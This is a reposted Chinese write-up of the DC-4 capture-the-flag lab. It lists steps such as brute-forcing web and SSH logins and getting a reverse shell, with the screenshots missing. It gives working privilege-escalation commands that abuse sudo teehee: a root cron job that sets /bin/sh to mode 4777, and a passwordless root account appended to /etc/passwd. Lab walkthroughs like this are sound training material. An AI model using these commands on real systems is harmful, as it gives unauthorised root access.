首页 > 其他 > 详细

DC-4

时间:2021-03-14 00:05:16      阅读:17      评论:0      收藏:0      [点我收藏+]

DC-4

主机存活探测

技术分享图片

扫描

技术分享图片

访问80

技术分享图片

爆破http

技术分享图片

技术分享图片

http登陆

技术分享图片

抓包

技术分享图片

技术分享图片

可以执行系统命令

尝试反弹shell

技术分享图片

技术分享图片

返回交互式命令行

技术分享图片

另外途径

技术分享图片

看到三个用户,可以用来爆破

技术分享图片

技术分享图片

技术分享图片

制作字典

技术分享图片

ssh爆破

技术分享图片

登陆

var/mail看到charles的密码

技术分享图片

切换到charles

技术分享图片

teehee提权

操作过程如下:

1、echo root chmod 4777 /bin/sh > /etc/crontab
2、sudo teehee /etc/crontab,然后写入的内容:* * * * * root chmod 4777 /bin/sh
(时间部分全部填写为*,默认这个定时任务每分钟执行一次。通过执行的脚本将 /bin/sh 的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。)
3、ls -la /bin/sh
4、/bin/sh

技术分享图片

添加一个admin账户,然后使用teehee执行直接写入 passwd中,然后切换为创建的admin用户

1、echo "test::0:0:::/bin/bash"
2、sudo teehee -a /etc/passwd
3、输入:test::0:0:::/bin/bash
4、然后ctrl+c退出,再su test切换用户,即可获得root权限

技术分享图片

DC-4

原文:https://www.cnblogs.com/liyu8/p/14530379.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!